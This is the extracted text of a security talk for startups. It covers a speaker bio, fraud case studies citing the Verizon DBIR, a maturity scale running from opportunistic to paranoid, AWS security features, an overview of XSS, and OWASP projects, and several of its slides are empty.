Rationalizing Security Matt Konda Jemurai @mkonda [email protected] https://en.wikipedia.org/wiki/Rational_function 

Introduction 1997 2006 2014 Consultant Engineer Software Architect Director of Engineering Rabble Rouser: Perl Java Applet C++ J2EE J2EE
 Spring Analytics Certificate Authority Vulnerability Scanner Penetration Test Manager Pricing Retail Banking Manufacturing Pharma Healthcare Research Ruby Rails Chicago BSides 2011, 2012 Defcon Skytalk OWASP Chicago, MSP 2013 AppSec USA 2012, 2013 ChicagoRuby 2013 Secure 360 Lone Star Ruby 2013 WindyCityRails 2013 Chicago JUG 2014 RailsConf 2014 Converge 2014 ChicagoCoderConference 2015 MS in CS Founder Consultant Agile Clojure Graph Database Big Data Trying to hack a business model that succeeds while helping developers. Domains: Projects: DevOps / Automation Training Coaching Code Review Plugged in to SDLC Consulting Assessments @mkonda [email protected] Secure DevOps Growing OWASP Board Agile Security 

Census? 

What are you hoping to get out of this? 

Metasploit Demo 

Case Study 1 e-Commerce Fraud 

“This year, organized crime became the most frequently seen threat actor for Web App Attacks.” Verizon 2015 DBIR 

No content

See • Botnets • Widespread use of harvested credentials • Account takeover • Credit card fraud • Dumps of passwords and sensitive data with SQLi • User pwnage with XSS 

Case Study 2 Healthcare Fraud 

“Two thirds of the incidents in this pattern had no attacker-attribution information whatsoever.” Verizon 2015 DBIR Cyber-Espionage 

See • Long term investment • Systematic targeting • Phishing / Social Engineering • Pivoting 

How long does it take for your host to get scanned / attacked on the open internet? 

As a startup, you’re probably not an You’re in experimental mode … 

You don’t want to worry about it 

There are generally three things that force you to think about security. 

No content

No content

No content

Your user’s privacy is important. 

So is your company’s privacy. 

Maturity Scale • Opportunistic • Defensible • Serious • Paranoid 

Opportunistic • Use platform provided security • Run tools yourself (eg. brakeman) 

Defensible • Policy, including data classification • Security assessments • Build servers to security standard 

Serious • Active monitoring, log collection • Incident response • Security in SDLC (Static analysis, code review, training, automation) • Have a security team, app security team (Network, Desktop, Server controls) 

Paranoid • Threat intelligence • Anti-Fraud • DDoS • Bug Bounty • Forensics 

Things you can do now. 

Use Services Provided • Use IAM to define groups users. Use MFA. • Limit Network Access, Use TrustedAdvisor • CloudTrail • Use encryption for S3, EBS, RDS, etc. • New: Inspector, WAF, Config Rules 

• XSS is really code injection. • The distinction is that the code is running in your user’s browser. • This can have crippling significance - because it bypasses network and other typical controls. Cross-site Scripting 

No content

beef demo 

No content

No content

No content

No content

No content

No content

OWASP Top 10 

Flagship Projects Tools • ZAP • OWASP Dependency Check • Web Testing Environment Project • OWTF Code • ModSecurity • CSRFGuard • AppSensor Documentation • ASVS • SAMM • Top 10 • Testing Guide • Benchmark 

OWASP ASVS 

Tiers • 0  –  Cursory  –  You  have  done   something.    You  define.   • 1  –  Opportunistic  –  Adequately  defends   against  easily  discoverable  items.   • 2  –  Standard  –  Adequately  defends   against  items  of  moderate  to  serious   risk.   • 3  –  Advanced  –  Defends  against  even   advanced  attacks  and  demonstrates   good  security  design. 

No content

Discussion … 

Technical questions? Eg. I’m using … what do I need to worry about? 

Get a partner and talk about what data you have that people might want … 

Villain persona 

Future topics?